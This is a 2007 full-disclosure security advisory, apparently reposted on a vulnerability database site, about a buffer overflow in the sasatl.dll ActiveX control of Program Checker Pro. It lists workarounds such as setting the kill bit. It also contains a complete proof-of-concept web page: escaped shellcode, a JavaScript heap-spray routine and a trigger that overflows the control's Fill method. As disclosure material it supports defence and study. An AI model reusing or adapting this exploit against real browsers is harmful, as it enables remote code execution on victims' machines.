Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:17452
HistoryJul 11, 2007 - 12:00 a.m.

[Full-disclosure] [GOODFELLAS - VULN] sasatl.dll 1.5.0.531 Program Checker - Javascript Heap Spraying Exploit

2007-07-1100:00:00
vulners.com
13
JSON

:. GOODFELLAS Security Research TEAM .:
:. http://goodfellas.shellcode.com.ar .:

sasatl.dll 1.5.0.531 Program Checker - Javascript Heap Spraying Exploit

Internal ID: VULWAR200707101.

Introduction

sasatl.dll is a library included in the Program Checker Pro software
package from the Zenturi. (http://www.programchecker.com)

Tested In

  • Windows XP SP1/SP2 english/french with IE 6.0 / 7.0.
  • Windows vista Professional English/French SP1 with IE 7.0

Summary

The Fill method is prone to a stack-based buffer-overflow vulnerability
because it fails to properly check boundaries.

Impact

An attacker could execute arbitrary code into the remote machine.

Workaround

  • Activate the Kill bit zero in
    clsid:7D6B5B29-FC7E-11D1-9288-00104B885781.
  • Unregister sasatl.dll using regsvr32.

Timeline

July 10, 2007 – Bug published.

Credits

  • callAX <[email protected]>
  • GoodFellas Security Research Team <goodfellas.shellcode.com.ar>

Proof of Concept

<HTML>
<BODY>
<object id=boom
classid="clsid:{7D6B5B29-FC7E-11D1-9288-00104B885781}"></object>

<SCRIPT>

var payLoadCode=unescape(
"%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800" +
"%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A" +
"%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350" +
"%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40" +
"%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000" +
"%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040" +
"%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD" +
"%u40C0%u4489%u1C24%uC361%uC031%uF6EB%u8B60%u2444%u0324%u3C40" +
"%u408D%u8D18%u6040%u388B%uFF09%u5274%u7C03%u2424%u4F8B%u8B18" +
"%u205F%u5C03%u2424%u49FC%u407C%u348B%u038B%u2474%u3124%u99C0" +
"%u08AC%u74C0%uC107%u07C2%uC201%uF4EB%u543B%u2824%uE175%u578B" +
"%u0324%u2454%u0F24%u04B7%uC14A%u02E0%u578B%u031C%u2454%u8B24" +
"%u1004%u4403%u2424%u4489%u1C24%uC261%u0008%uC031%uF4EB%uFFC9" +
"%u10DF%u9231%uE8BF%u0000%u0000%u0000%u0000%u9000%u6163%u636C" +
"%u652E%u6578%u9000");

var spraySlide = unescape&#40;&quot;&#37;u9090&#37;u9090&quot;&#41;;

var heapSprayToAddress = 0x0c0c0c0c;

function Tryme&#40;&#41;
{
    var size_buff = 900;
    var x =  unescape&#40;&quot;&#37;0C&#37;0C&#37;0C&#37;0C&quot;&#41;;
    while &#40;x.length&lt;size_buff&#41; x += x;
    x = x.substring&#40;0,size_buff&#41;;

    boom.Fill&#40;x&#41;;
}


   function getSpraySlide&#40;spraySlide, spraySlideSize&#41;

{
while (spraySlide.length*2<spraySlideSize)
{
spraySlide += spraySlide;
}
spraySlide = spraySlide.substring(0,spraySlideSize/2);
return (spraySlide);
}

    var heapBlockSize = 0x400000;
    var SizeOfHeapDataMoreover = 0x26;
var payLoadSize = &#40;payLoadCode.length * 2&#41;;

var spraySlideSize = heapBlockSize - &#40;payLoadSize +

SizeOfHeapDataMoreover);
var heapBlocks = (heapSprayToAddress+heapBlockSize)/heapBlockSize;

var memory = new Array&#40;&#41;;
    spraySlide = getSpraySlide&#40;spraySlide,spraySlideSize&#41;;

for &#40;i=0;i&lt;heapBlocks;i++&#41;
    {
        memory[i] = spraySlide +  payLoadCode;
    }

</SCRIPT>
<input language=JavaScript onclick=Tryme() type=button value="Proof of
Concept">
</BODY>
</HTML>

Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

JSON